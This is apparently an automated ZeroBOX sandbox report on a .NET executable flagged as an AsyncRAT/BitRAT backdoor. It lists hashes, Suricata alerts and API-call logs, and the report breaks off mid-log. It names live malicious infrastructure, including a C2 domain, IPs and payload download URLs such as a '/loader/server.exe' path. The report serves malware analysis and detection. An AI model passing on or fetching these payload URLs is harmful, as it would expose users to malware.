popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Rckjlz.exe

Generic Malware Downloader Antivirus Code injection DGA Escalate priviledges Socket ScreenShot KeyLogger Create Service SMTP Internet API DNS Anti_VM Sniff Audio GIF Format .NET EXE PE32 PE File AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 23, 2022, 11:51 a.m. Oct. 23, 2022, 11:54 a.m.
Size 192.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 54e5e90fbafdf6f051f2c89da50a4b95
SHA256 e4d62d22644bd8f7b85b47328cbac771dd76473902ac2a92cb3bb06ff7ed091a
CRC32 8D8C7CE3
ssdeep 1536:bB+R6Ywvj1k3w45lEdhKzoUSFeuiS2FIlKbz0PEziNQKjoa:tAwvj1Mw4shKzoUSFeuiS2FIIcwKoa
Yara
  • IsPE32 - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Is_DotNET_EXE - (no description)
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
gh9st.mywire.org
A 107.174.212.121
107.174.212.121
ripley.studio
A 107.175.247.199
107.175.247.199
IP Address Status Action
107.174.212.121 Active Moloch
107.175.247.199 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 107.175.247.199:80 -> 192.168.56.101:49161 2017962 ET MALWARE PE EXE or DLL Windows file download disguised as ASCII A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49161 2022640 ET MALWARE PE EXE or DLL Windows file download Text M2 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49161 2035769 ET HUNTING [TW] Likely Hex Executable String Misc activity
TCP 192.168.56.101:49167 -> 107.175.247.199:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49167 -> 107.175.247.199:80 2022550 ET MALWARE Possible Malicious Macro DL EXE Feb 2016 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2035769 ET HUNTING [TW] Likely Hex Executable String Misc activity
TCP 107.175.247.199:80 -> 192.168.56.101:49161 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String Executable code was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String Executable code was detected
TCP 192.168.56.101:49177 -> 107.174.212.121:5005 906200095 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (BitRAT) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.101:49177
107.174.212.121:5005 		CN=GH9ST CN=GH9ST 0e:27:6e:bc:2d:52:a5:8a:4a:31:f1:c9:33:16:53:8b:85:24:af:a7

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056b3c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056b3c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056b4c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef070
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eec30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eec30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eec30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef4f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eed70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef9f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef9f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00c7b138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00c7b138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00c7b238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00330d38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00330eb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00330eb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00330eb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72951194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72822ba1
mscorlib+0x9f1e83 @ 0x721d1e83
0x71020c
0x7100c1
0x710068
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x727a2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x727b264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x727b2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72867610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728f1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728f1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728f1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728f416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7415f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x741d7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x741d4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 4911900
registers.edi: 0
registers.eax: 4911900
registers.ebp: 4911980
registers.edx: 0
registers.ebx: 6120360
registers.esi: 5740304
registers.ecx: 2034736085
1 0 0

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x722b1194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72182ba1
mscorlib+0x9f1e3f @ 0x71b31e3f
0x23101e2
0x2310163
0x23100d5
0x2310068
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72102652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7211264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72112e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721c74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x721c7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72251dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72251e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72251f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7225416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x741af5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73497f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73494de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 2093204
registers.edi: 0
registers.eax: 2093204
registers.ebp: 2093284
registers.edx: 0
registers.ebx: 13321472
registers.esi: 13143280
registers.ecx: 3398238948
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET http://ripley.studio/loader/uploads/Yjnhiv.jpeg
suspicious_features Connection to IP address suspicious_request GET http://107.175.247.199/loader/server.exe
request GET http://ripley.studio/loader/uploads/Yjnhiv.jpeg
request GET http://107.175.247.199/loader/server.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 1835008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00650000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02140000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00362000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0037c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00396000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0039a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00397000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0036a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0039b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00711000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00714000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00716000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00718000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0071d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044af000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0037d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0071e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0071f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0036c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0037e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0037f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04570000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0037a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
